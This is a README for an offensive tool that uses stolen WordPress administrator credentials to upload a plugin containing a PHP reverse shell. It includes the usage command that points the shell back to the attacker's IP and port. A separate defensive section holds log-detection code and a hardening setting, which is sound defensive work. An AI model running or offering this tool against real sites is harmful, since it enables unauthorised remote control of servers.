Pwn_wordpress

Hacking WordPress plugins: authenticated shell upload by compromising the admin console and uploading a malicious plugin containing PHP reverse shell code.

Primary language: Python. License: GNU General Public License v2.0 (GPL-2.0).

Evil Wordpress Plugin (Malicious)

Malicious.py remotely uploads a PHP reverse shell, packaged as a plugin, to a WordPress site. The exploit only succeeds with valid user credentials, so make sure you know the target username and password and check that the target user has Administrator permissions.

Install by running:

  git clone https://github.com/Jsmoreira02/Pwn_wordpress.git

Attacking the Target Website:


  • The speed depends on your connection; if execution slows down, check that your connection is stable.

  python3 Malicious.py -t http://<IP or domain_name> -u <Target Username> -p <Target Password> -L <LOCAL IP> -P <LOCAL PORT>

If you run into complications or disconnections, you can trigger the connection manually by visiting the URL that the script gives you.
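Seen from the defender's side, an authenticated plugin upload followed by a request to the uploaded PHP file leaves a recognisable pair of entries in the web server's access log. The sketch below is an added example, not part of this repository: it flags an accepted POST to WordPress's plugin upload endpoint that is followed shortly afterwards by a direct hit on a .php file under /wp-content/plugins/. It assumes combined log format; the log lines, plugin names and the 10-minute window are constructed for illustration.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "POST /wp-login.php HTTP/1.1" 302 0
203.0.113.7 - - [12/Mar/2024:10:01:05 +0000] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 5120
203.0.113.7 - - [12/Mar/2024:10:01:09 +0000] "GET /wp-content/plugins/example-plugin/example.php HTTP/1.1" 200 0
198.51.100.4 - - [12/Mar/2024:10:05:00 +0000] "GET /wp-content/plugins/sample-gallery/index.php HTTP/1.1" 403 0
198.51.100.9 - - [12/Mar/2024:11:30:00 +0000] "GET /wp-admin/update.php?action=upgrade-plugin HTTP/1.1" 200 900
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
PLUGIN_PHP_RE = re.compile(r'^/wp-content/plugins/([^/]+)/.+\.php$', re.I)

def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None  # skip lines that are not in the expected format
    url = urlsplit(m["target"])
    return {
        "ip": m["ip"],
        "time": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"], "path": url.path,
        "query": parse_qs(url.query), "status": int(m["status"]),
    }

def find_upload_then_exec(log_text, window=timedelta(minutes=10)):
    """Return alerts for a plugin upload followed by a direct plugin .php hit."""
    alerts, uploads = [], []  # uploads: (time, ip) of accepted upload requests
    for ev in filter(None, map(parse, log_text.splitlines())):
        is_upload = (ev["method"] == "POST"
                     and ev["path"] == "/wp-admin/update.php"
                     and ev["query"].get("action") == ["upload-plugin"]
                     and ev["status"] == 200)
        if is_upload:
            uploads.append((ev["time"], ev["ip"]))
            continue
        hit = PLUGIN_PHP_RE.match(ev["path"])
        if hit and ev["status"] == 200:  # plugin PHP file served directly
            for up_time, up_ip in uploads:
                if timedelta(0) <= ev["time"] - up_time <= window:
                    alerts.append({"uploader": up_ip, "requester": ev["ip"],
                                   "plugin": hit.group(1), "path": ev["path"]})
                    break
    return alerts
```

Setting `define('DISALLOW_FILE_MODS', true);` in wp-config.php disables plugin installation from the admin console, which closes this upload path even when an administrator password is compromised.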

  • Good hacking :)

Warning:

I am not responsible for any illegal use or damage caused by this tool. It was written for fun, not evil, and is intended to raise awareness about cybersecurity.